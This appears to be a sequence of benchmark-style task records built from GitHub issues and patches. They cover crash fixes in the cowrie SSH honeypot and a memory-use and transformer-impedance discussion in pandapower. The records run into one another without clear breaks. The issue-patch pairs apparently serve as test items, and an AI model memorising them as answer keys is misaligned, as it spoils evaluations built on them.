Gcc "compile" file quits cowrie **Describe the bug** By running gcc to "compile" a file just quits cowrie **To Reproduce** Steps to reproduce the behavior: 1. Login on the honeypot 2. Compile the file with `gcc file.c` 4. See error and cowrie will quit(`Connection to localhost closed by remote host.`) **Expected behavior** To compile the file **Server (please complete the following information):** - OS: Ubuntu 22.04 - Python: Python 3.10 **Additional context** ``` 2022-08-25T15:35:01.948821Z [HoneyPotSSHTransport,7728,127.0.0.1] CMD: gcc hi.c -o p 2022-08-25T15:35:01.950607Z [HoneyPotSSHTransport,7728,127.0.0.1] Command found: gcc hi.c -o p 2022-08-25T15:35:01.952849Z [HoneyPotSSHTransport,7728,127.0.0.1] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/posixbase.py", line 683, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/transport.py", line 790, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/service.py", line 50, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 173, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 233, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 126, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 435, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 329, in handle_RETURN return 
recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 493, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 190, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 114, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 329, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 310, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 199, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/gcc.py", line 135, in start self.scheduled = reactor.callLater( # type: ignore[attr-defined] File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/base.py", line 868, in callLater assert builtins.callable(callable), f"{callable} is not callable" builtins.AssertionError: None is not callable ```
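The assertion ("None is not callable") comes from handing `reactor.callLater` the *result* of `self.generate_file(...)` instead of the function itself. A minimal sketch of the bug pattern and its fix (`make_file` is a hypothetical stand-in for `generate_file`):

```python
from twisted.internet import reactor

def make_file(name):
    print("would create", name)

# BUG: make_file("a.out") runs immediately and returns None, so callLater
# receives None as its "callable" -> builtins.AssertionError at schedule time
# reactor.callLater(2, make_file("a.out"))

# Fix (what the patch above does): pass the callable and its argument separately
reactor.callLater(2, make_file, "a.out")
reactor.callLater(3, reactor.stop)
reactor.run()
```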
2022-08-28T09:33:51
cowrie/cowrie
1,817
cowrie__cowrie-1817
[ "1815" ]
bf55a591bfada6ce2ca43391c784a5e9c2b98ee3
diff --git a/src/cowrie/ssh/transport.py b/src/cowrie/ssh/transport.py --- a/src/cowrie/ssh/transport.py +++ b/src/cowrie/ssh/transport.py @@ -113,18 +113,18 @@ def dataReceived(self, data: bytes) -> None: if not self.gotVersion: if b"\n" not in self.buf: return - otherVersion: bytes = self.buf.split(b"\n")[0].strip() + self.otherVersionString: bytes = self.buf.split(b"\n")[0].strip() log.msg( eventid="cowrie.client.version", - version=otherVersion.decode( + version=self.otherVersionString.decode( "utf-8", errors="backslashreplace" ), format="Remote SSH version: %(version)s", ) - m = re.match(rb"SSH-(\d+.\d+)-(.*)", otherVersion) + m = re.match(rb"SSH-(\d+.\d+)-(.*)", self.otherVersionString) if m is None: log.msg( - f"Bad protocol version identification: {repr(otherVersion)}" + f"Bad protocol version identification: {repr(self.otherVersionString)}" ) # OpenSSH sending the same message self.transport.write(b"Invalid SSH identification string.\n") @@ -133,7 +133,7 @@ def dataReceived(self, data: bytes) -> None: self.gotVersion = True remote_version = m.group(1) if remote_version not in self.supportedVersions: - self._unsupportedVersionReceived(otherVersion) + self._unsupportedVersionReceived(self.otherVersionString) return i = self.buf.index(b"\n") self.buf = self.buf[i + 1 :] diff --git a/src/cowrie/ssh_proxy/server_transport.py b/src/cowrie/ssh_proxy/server_transport.py --- a/src/cowrie/ssh_proxy/server_transport.py +++ b/src/cowrie/ssh_proxy/server_transport.py @@ -211,18 +211,18 @@ def dataReceived(self, data: bytes) -> None: if not self.gotVersion: if b"\n" not in self.buf: return - otherVersion = self.buf.split(b"\n")[0].strip() + self.otherVersionString = self.buf.split(b"\n")[0].strip() log.msg( eventid="cowrie.client.version", - version=otherVersion.decode( + version=self.otherVersionString.decode( "utf-8", errors="backslashreplace" ), format="Remote SSH version: %(version)s", ) - m = re.match(rb"SSH-(\d+.\d+)-(.*)", otherVersion) + m = re.match(rb"SSH-(\d+.\d+)-(.*)", self.otherVersionString) if m is None: log.msg( - f"Bad protocol version identification: {repr(otherVersion)}" + f"Bad protocol version identification: {repr(self.otherVersionString)}" ) if self.transport: self.transport.write(b"Protocol mismatch.\n")
builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' **Describe the bug** I used the docker version of cowrie and got this error: `builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString'` when I tried to SSH to the cowrie server. **To Reproduce**
1. create a docker compose service file `compose.yaml`:
```yaml
services:
  cowrie:
    image: cowrie/cowrie:latest
    ports:
      - "22:2222"
    restart: always
```
2. start cowrie by executing `docker compose up` in the directory where the `compose.yaml` file is located
3. perform an SSH login attempt from elsewhere (e.g. from a Windows PC): `ssh -p22 cowrie_server_ip`
4. get the `Connection closed by cowrie_server_ip port 22` error from your SSH client
5. check cowrie's log and find the `builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString'` error

**Expected behavior** cowrie should accept the SSH login attempt correctly. **Server (please complete the following information):** - OS: [5.15.0-58-generic # 64~20.04.1-**Ubuntu** SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux] - Python: [3.8.10] **Additional context** ### full log ``` cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:97: CryptographyDeprecationWarning: Blowfish has been deprecated cowrie-cowrie-1 | b"blowfish-cbc": (algorithms.Blowfish, 16, modes.CBC), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:101: CryptographyDeprecationWarning: CAST5 has been deprecated cowrie-cowrie-1 | b"cast128-cbc": (algorithms.CAST5, 16, modes.CBC), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:106: CryptographyDeprecationWarning: Blowfish has been deprecated cowrie-cowrie-1 | b"blowfish-ctr": (algorithms.Blowfish, 16, modes.CTR), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:107: CryptographyDeprecationWarning: CAST5 has been deprecated cowrie-cowrie-1 | b"cast128-ctr": (algorithms.CAST5, 16, modes.CTR), cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Python Version 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Twisted Version 22.10.0 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Cowrie Version 2.5.0 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Loaded output engine: jsonlog cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Loaded output engine: textlog cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] twistd 22.10.0 (/cowrie/cowrie-env/bin/python3 3.9.2) starting up. cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] reactor class: twisted.internet.epollreactor.EPollReactor.
cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] CowrieSSHFactory starting on 2222 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [cowrie.ssh.factory.CowrieSSHFactory#info] Starting factory <cowrie.ssh.factory.CowrieSSHFactory object at 0x7fdce7e47b50> cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Ready to accept SSH connections cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha256 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] New connection: 10.249.47.179:35369 (172.19.0.2:2222) [session: 6ebb4f6a7eca] cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Remote SSH version: SSH-2.0-OpenSSH_for_Windows_8.1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] SSH client hassh fingerprint: ec7378c1a92f5a8dde7e8b7a1ddf33d1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ecdsa-sha2-nistp256' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] outgoing: b'aes128-ctr' b'hmac-sha2-512' b'none' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] incoming: b'aes128-ctr' b'hmac-sha2-512' b'none' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Unhandled Error cowrie-cowrie-1 | Traceback (most recent call last): cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 96, in callWithLogger cowrie-cowrie-1 | return callWithContext({"system": lp}, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 80, in callWithContext cowrie-cowrie-1 | return context.call({ILogContext: newCtx}, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext cowrie-cowrie-1 | return self.currentContext().callWithContext(ctx, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext cowrie-cowrie-1 | return func(*args, **kw) cowrie-cowrie-1 | --- <exception caught here> --- cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite cowrie-cowrie-1 | why = selectable.doRead() cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 248, in doRead cowrie-cowrie-1 | return self._dataReceived(data) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived cowrie-cowrie-1 | rval = self.protocol.dataReceived(data) cowrie-cowrie-1 | File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 144, in dataReceived cowrie-cowrie-1 | self.dispatchMessage(messageNum, packet[1:]) cowrie-cowrie-1 | File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 148, in dispatchMessage cowrie-cowrie-1 | transport.SSHServerTransport.dispatchMessage(self, messageNum, payload) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 781, in dispatchMessage cowrie-cowrie-1 | f(payload) cowrie-cowrie-1 | File 
"/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1618, in ssh_KEX_DH_GEX_REQUEST_OLD cowrie-cowrie-1 | return self._ssh_KEX_ECDH_INIT(packet) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1530, in _ssh_KEX_ECDH_INIT cowrie-cowrie-1 | h.update(NS(self.otherVersionString)) cowrie-cowrie-1 | builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' cowrie-cowrie-1 | cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#info] connection lost cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Connection lost after 0 seconds ```
Hi @HuengchI I was having the same, and ended up moving backwards from latest through the images. and cowrie/cowrie:59f4ed7f worked for me. https://hub.docker.com/r/cowrie/cowrie/tags > I was having the same, and ended up moving backwards from latest through the images. and cowrie/cowrie:59f4ed7f worked for me. @jquiros2 Thanks! I'll have a try. It seems that the latest version has some bugs. The same error occurs even when I performed a ["7-step standard installation"](https://cowrie.readthedocs.io/en/latest/INSTALL.html#installing-cowrie-in-seven-steps) following the document. I have the same issue with the latest image. 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha1 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha256 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] New connection: 192.168.1.15:65199 (172.17.0.4:2222) [session: 55969b675696] 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Remote SSH version: SSH-2.0-PuTTY_Release_0.76 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] SSH client hassh fingerprint: 5b7713a9ef2d162b16ea018fa8d40f02 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ssh-ed25519' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha1' b'none' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha1' b'none' 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Unhandled Error Traceback (most recent call last): File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite why = selectable.doRead() File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, messageNum, payload) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 781, in dispatchMessage f(payload) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1618, in ssh_KEX_DH_GEX_REQUEST_OLD return self._ssh_KEX_ECDH_INIT(packet) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1530, in _ssh_KEX_ECDH_INIT h.update(NS(self.otherVersionString)) 
builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#info] connection lost 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Connection lost after 0 seconds Confirmed bug! Sorry about this! This shows the testing framework needs an integration test.
2023-02-06T02:10:24
e2nIEE/pandapower
97
e2nIEE__pandapower-97
[ "93" ]
fbdf93fcd56d7709076130e67e469b3b0b722370
diff --git a/pandapower/auxiliary.py b/pandapower/auxiliary.py --- a/pandapower/auxiliary.py +++ b/pandapower/auxiliary.py @@ -399,6 +399,17 @@ def _check_bus_index_and_print_warning_if_high(net, n_max=1e7): " Try resetting the bus indices with the toolbox function " "create_continous_bus_index()" % max_bus) +def _check_gen_index_and_print_warning_if_high(net, n_max=1e7): + if net.gen.empty: + return + max_gen = max(net.gen.index.values) + if max_gen >= n_max and len(net["gen"]) < n_max: + logger.warning( + "Maximum generator index is high (%i). You should avoid high generator indices because of perfomance reasons." + #" Try resetting the bus indices with the toolbox function " + #"create_continous_bus_index()" + % max_gen) + def _add_pf_options(net, tolerance_kva, trafo_loading, numba, ac, algorithm, max_iteration, **kwargs): diff --git a/pandapower/run.py b/pandapower/run.py --- a/pandapower/run.py +++ b/pandapower/run.py @@ -7,7 +7,8 @@ import numpy as np from pandapower.auxiliary import _add_pf_options, _add_ppc_options, _add_opf_options, \ - _check_if_numba_is_installed, _check_bus_index_and_print_warning_if_high + _check_if_numba_is_installed, _check_bus_index_and_print_warning_if_high, \ + _check_gen_index_and_print_warning_if_high from pandapower.optimal_powerflow import _optimal_powerflow from pandapower.opf.validate_opf_input import _check_necessary_opf_parameters from pandapower.powerflow import _powerflow @@ -244,6 +245,7 @@ def runpp(net, algorithm='nr', calculate_voltage_angles="auto", init="auto", max # net.__internal_options.update(overrule_options) net._options.update(overrule_options) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _powerflow(net, **kwargs) @@ -310,6 +312,7 @@ def rundcpp(net, trafo_model="t", trafo_loading="current", recycle=None, check_c _add_pf_options(net, tolerance_kva=tolerance_kva, trafo_loading=trafo_loading, numba=numba, ac=ac, algorithm=algorithm, max_iteration=max_iteration) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _powerflow(net, **kwargs) @@ -385,6 +388,7 @@ def runopp(net, verbose=False, calculate_voltage_angles=False, check_connectivit voltage_depend_loads=False, delta=delta) _add_opf_options(net, trafo_loading=trafo_loading, ac=ac, numba=numba) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _optimal_powerflow(net, verbose, suppress_warnings, **kwargs) @@ -446,4 +450,5 @@ def rundcopp(net, verbose=False, check_connectivity=True, suppress_warnings=True voltage_depend_loads=False, delta=delta) _add_opf_options(net, trafo_loading=trafo_loading, ac=ac) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _optimal_powerflow(net, verbose, suppress_warnings, **kwargs)
Large indices lead to high memory consumption Creating a network with large indices, e.g. when creating generators, leads to high memory consumption. The problem is the line `lookup = -np.ones(max(pandapower_index) + 1, dtype=int)` when building the lookup: https://github.com/lthurner/pandapower/blob/aef97f1f16ab496dd7d0b772c486b6e3be566b93/pandapower/pd2ppc.py#L255-L269 If one index is very large, this creates a huge (mostly empty) ndarray, filling the memory. While I have not checked with the rest of the code, this seems unnecessary. The same problem exists when building the bus lookup: https://github.com/lthurner/pandapower/blob/aef97f1f16ab496dd7d0b772c486b6e3be566b93/pandapower/build_bus.py#L109-L117 For buses a workaround is to call `pandapower.create_continuous_bus_index(net, start=0)` before running the powerflow. The problem only becomes significant for large indices greater than 100000000, which might be unusual but occurred in some of my calculations. For smaller indices it still seems like a waste of memory though.
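A small, self-contained illustration of the effect described above (the index values are made up, not taken from the issue):

```python
import numpy as np

# One very large pandapower index forces a dense lookup array spanning the
# whole index range, even though only a handful of slots are ever used.
pp_index = np.array([0, 1, 100_000_000])
lookup = -np.ones(pp_index.max() + 1, dtype=int)  # ~0.8 GB of int64 for 3 elements
lookup[pp_index] = np.arange(len(pp_index))
print(f"{lookup.nbytes / 1e9:.1f} GB for {len(pp_index)} elements")
```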
Our tests showed that the current implementation of the bus lookup (+numba) is the most performant one. So we decided to trade slightly higher memory usage for increased performance (the resulting memory footprint is negligible for reasonable maximal bus indices). In order to let unaware users know about this peculiarity, we log a warning in case large bus index values are encountered. I was not aware that we use a similar implementation for the element lookup. Maybe we should log a warning here too.

The problem should be easily solved by net.gen.reset_index(inplace=True) ?

Thanks for the explanation. If you have done the tests, I am the last person who stands in the way of a performance increase by wasting a bit of memory, which in most cases should indeed be insignificant. However, a warning would be nice. But I wonder if you have considered very sparse indices in your performance tests. I would suspect that the performance per number of elements would decrease with sparser indices? The data I am dealing with at the moment uses one continuous index for all types of network elements, which leads to a sparse index for one type of element. Initially I used `create_continuous_bus_index` and ignored the index for all other elements to make it run at all, but this makes comparison with the original data very hard. Luckily I can process the original data for a more compact index, since already for that data an index of > 100000000 is not necessary. So I would still recommend a warning, and I still might hit this problem in the future when dealing with larger data sets...

FYI, a little bit of history: The first implementation was with dicts and very low memory consumption, with key = pandapower index, val = ppc index. This was really slow for large arrays, since it was necessary to iterate over every key in the dict. Since every index is unique, we switched to the array where array_index = pandapower index, array_val = ppc_index. As ascheidl said, this is the fastest solution we found, but it has problems with large indices. Maybe a sparse lookup would be a compromise here.

Thank you for the hint! One additional note on using very high index numbers: a use case where this happens is if you have some identifying number that you want to use as an index. I don't know if that's your use case or not, but if so, an alternative to using the ID as an index is to just use continuous indices when creating the net, and put the IDs in a new column, e.g. net.bus.ID. This way you avoid the memory problem, and you also avoid losing leading or trailing zeros. Because if you have an ID such as 0125810, this would become index 125810 and you might have trouble identifying it later on. If you save it in a new column as a string, all information can be preserved.

Regarding the idea of a sparse lookup array, I tested it with a pandas SparseArray. The access times are significantly higher with the sparse solution, especially if not one value is accessed, but many at one time:

> dense = np.random.randn(1000000)
> sparse = pd.SparseArray(dense)
> %timeit dense[500:1000]

631 ns ± 36.9 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)

> %timeit sparse[500:1000]

55.9 ms ± 7.75 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)

The sparse array is more efficient in memory, but the access time for multiple values is almost constant for dense arrays. It does not scale well for the sparse version, because presumably the values are accessed in a loop. So I don't think that's a viable alternative.
#edit: The first implementation with dictionaries in comparison:

> lookup = {i: i for i in range(500, 1000)}
> %timeit [lookup[i] for i in range(500, 1000)]

115 µs ± 6.92 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)
2018-04-11T09:13:10
e2nIEE/pandapower
102
e2nIEE__pandapower-102
[ "54" ]
9f093d930a99d5d61af5659c8505fb9009f525db
diff --git a/pandapower/build_branch.py b/pandapower/build_branch.py --- a/pandapower/build_branch.py +++ b/pandapower/build_branch.py @@ -443,8 +443,10 @@ def _trafo_df_from_trafo3w(net): kt = _transformer_correction_factor(vsc, vscr, sn, 1.1) vsc_2w_delta *= kt vscr_2w_delta *= kt - vsc_2w = wye_delta(vsc_2w_delta, sn) + vsci_2w_delta = np.sqrt( vsc_2w_delta ** 2 - vscr_2w_delta ** 2) vscr_2w = wye_delta(vscr_2w_delta, sn) + vsci_2w = wye_delta(vsci_2w_delta, sn) + vsc_2w = np.sign(vsci_2w) * np.sqrt(vsci_2w ** 2 + vscr_2w ** 2) taps = [dict((tv, np.nan) for tv in tap_variables) for _ in range(3)] for k in range(3): taps[k]["tp_side"] = None @@ -888,4 +890,4 @@ def _transformer_correction_factor(vsc, vscr, sn, cmax): def get_is_lines(net): _is_elements = net["_is_elements"] - _is_elements["line"] = net["line"][net["line"]["in_service"].values.astype(bool)] \ No newline at end of file + _is_elements["line"] = net["line"][net["line"]["in_service"].values.astype(bool)]
build branches from trafo3w **Issue** In very specific cases of 3-winding transformer parameters, it may happen that the short-circuit impedance `z_sc` ends up smaller than the resistance `r_sc`; specifically, this leaves [this line](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L364) with a negative value under the sqrt (and hence a NaN value of `x_sc` and a singular Jacobian matrix).

**Error log**: ![image](https://user-images.githubusercontent.com/9588722/27687950-0ee21382-5cd9-11e7-92af-bdab47ed3444.png)

**Reason**: this behavior arises because three-winding transformers are first transformed to equivalent 2-winding transformers (wye-delta transformation) and then branches are created using the same routines as for 2-winding transformers (there is a reason for this: 3w and 2w transformers use the same build_branch routines, so during development any change for 2w also holds for 3w). After the wye-delta conversion the resulting parameters do not represent physical values, so they can take unrealistic values (even negative values are possible). More specifically, after the conversion of 3w transformers to 2w, the resulting `vsc_percent` and `vscr_percent` of each transformer can, in some specific cases, take values such that `z_sc < r_sc`.

**Solution suggestion**: Instead of transforming a 3-winding transformer to 2-winding ones and then building branches from the 2-winding transformers, direct building of 3 branches from a 3-winding transformer should be implemented. Also, the branch impedance should be calculated first and the wye-delta conversion performed afterwards. This should result in exactly the same branch values in all cases, but avoid this issue in the specific cases described above.
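A minimal, self-contained illustration of the failure mode (the numbers are invented, not from a real transformer):

```python
import numpy as np

# After the delta-to-wye conversion, the fictitious 2-winding transformers can
# end up with |z_sc| < r_sc, so the reactance computation goes negative under
# the square root:
vsc_percent, vscr_percent = 0.5, 1.2
x_sc = np.sqrt(vsc_percent**2 - vscr_percent**2)  # RuntimeWarning, result is nan
print(x_sc)  # nan -> singular Jacobian later in the power flow
```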
Yes, this is a good idea, please go ahead. Please also add one of these special cases to the test suite so this behaviour is tested for the future. Maybe while we are looking into 3W transformers we can also address switches at 3W transformers, as discussed in #30

There are some more issues within this issue that I noticed when building branches from a 3-winding trafo, due to differences between the branch parameters obtained using the current pandapower release and the branches I got:

- when [calculating](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L298) the magnetising admittance, `sn_hv_kva` is used, and I think `min(sn_hv_kva, sn_mv_kva)` should be used !? (if I am not terribly wrong?) ![image](https://user-images.githubusercontent.com/9588722/28774656-d2a4f28e-75ee-11e7-9a77-0b1ebce43c57.png)
- in the current implementation, first `vsc_percent` and `vscr_percent` are transformed delta-to-wye and then r and x are calculated from them for each of the 3 branches. The right order should be to first calculate `x12, x23, x13` and then make the wye-delta transformation. In other words, the result is not the same if one first transforms `z12, z23, z13` to `z1, z2, z3` and then calculates `x1, x2, x3`... as when one first calculates `x12, x23, x13` and then transforms them to `x1, x2, x3`

There are some less important things to be mentioned:

- documentation for the trafo3w should be updated in any case (there is no mention of `min(sn_hv_kva, sn_mv_kva)`)
- using `shift_mv_degree` and `shift_lv_degree` is not really clear to me? phase shift should be related to the tap, so if there is one tap on a trafo3w, there should be only one phase_shift; then internally this tap should be calculated for each side? if I am not terribly wrong?
- by direct generation of branches from 3-winding transformers, there is no need to define a voltage level for the additional bus. All the values are calculated on the side of the additional bus, where we can assume the base (nominal) voltage is equal to the rated one.
- why this: `b_img[b_img < 0] = 0` [here](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L301) ?

Hi Jakov, thanks for taking the time for this implementation, I think it is very good to get a vectorized implementation of the 3-winding transformers. Apart from the incompatibility with certain values there is also the time factor: we recently had a network with several hundred 3w transformers where the 3w conversion took up about 2/3 of the power flow time. This should speed up things nicely.

> when calculating the magnetising admittance, sn_hv_kva is used, and I think min(sn_hv_kva, sn_mv_kva) should be used !? (if I am not terribly wrong?)

